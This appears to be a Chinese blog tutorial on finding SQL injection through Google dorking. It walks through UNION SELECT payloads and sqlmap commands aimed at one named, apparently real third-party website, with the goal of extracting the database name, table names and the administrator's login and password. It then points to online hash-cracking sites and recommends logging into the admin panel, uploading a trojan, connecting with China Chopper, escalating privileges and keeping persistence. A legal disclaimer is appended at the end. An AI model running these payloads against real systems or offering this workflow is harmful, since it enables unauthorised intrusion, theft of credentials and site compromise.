利用Google手工挖SQL注入漏洞

 

SQL注入挖洞教程

 

  1. 挂上代理。访问谷歌

 www、google、com

     A    inurl:news-detail.php?id= 

 

 

  1. 添加单引号。确认是否存在SQL注入漏洞

http://belbana.com/news-detail.php?id=3’

 

3构建URL查询数据库名字。

http://belbana.com/news-detail.php?id=3%20and%201=2 UNION SELECT 1,2,3,user(),5,6,7,8,database(),10,11,12

 

4 构建URL查询数据表名字

http://belbana.com/news-detail.php?id=3%20and%201=2 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12 from information_schema.tables where table_schema=0x49443134383939345f636d73

 

 

 

5 构建URL,查询字段名称。上图发现admin是管理员用户表

 

 

6 查询数据。

http://belbana.com/news-detail.php?id=3%20and%201=2 UNION SELECT 1,2,3,4,5,6,7,8,concat(login,0x2d,paswoord),10,11,12  from admin

 

 

 

  1. 在线解密

 www.cmd5.com

 www.somd5.com 

如果是加了密的密码。可以在这里解密。

 

到这里SQL注入已经完成了。

8 找后台登录地址,用找到的用户名和密码进行登录后台。登录后查找是否有代码编辑、或者在线编辑器、或者文件上传等、上传木马、中国菜刀连上去、提权、权限维持、书写渗透测试报告

 

 

附上sqlmap教程:

  1. 自己的电脑安装sqlmap。

  安装地址是:https://github.com/sqlmapproject/sqlmap 这里有教程。建议用google浏览器打开。直接翻译看的明白

 

 

2.

命令:

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3"

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3"--current-dbs  #查看当前数据库

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3" --dbs #查看所有的数据库

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3" -D’ID148994_cms ’--tables #查看表

 

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3" -D’ID148994_cms ’-T”admin” --columns #查看admin表的字段

sqlmap.py  -u "http://belbana.com/news-detail.php?id=3" -D’ID148994_cms ’-T”admin”-C’login,paswoord’ --dump #打印管理员表的数据,自动解密

"http://belbana.com/news-detail.php?id=3"--is-dba #判断是否是数据库管理员

 

 

 

 

 

  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入是一种常见的网络安全漏洞,攻击者通过注入恶意的SQL代码来获取数据库中的数据或者执行非法操作。引用中提到了一个名为sqlmap的工具,它是用来识别和利用SQL注入漏洞的。请注意,为了遵守法律规定,我们不鼓励或支持在他人的网站上进行恶意攻击或破坏行为。 在进行sqlmap实战之前,首先需要确认目标网站是否存在SQL注入漏洞。可以通过访问网页并尝试使用一些特殊字符或语法进行测试。引用中的示例展示了如何使用id=参数进行测试,如果返回的结果与预期不符,说明该页面可能存在注入漏洞。 一旦确认目标网站存在注入漏洞,可以使用sqlmap来进行实际的注入测试。sqlmap是一个功能强大的工具,可以自动检测和利用SQL注入漏洞。它提供了多种选项和参数,可以根据需要进行定制化设置。具体的使用教程可以参考引用所提供的详细笔记。 需要强调的是,只有在授权的情况下,才能使用sqlmap工具进行漏洞测试。同时,建议在测试时使用自己的虚拟机环境,避免对他人网站造成不必要的损害。最重要的是,及时修复和加固自己的网站,以减少SQL注入漏洞的风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sqlmap 进行sql漏洞注入](https://blog.csdn.net/qq_42876636/article/details/87691842)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记](https://download.csdn.net/download/qq_34953582/87973686)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值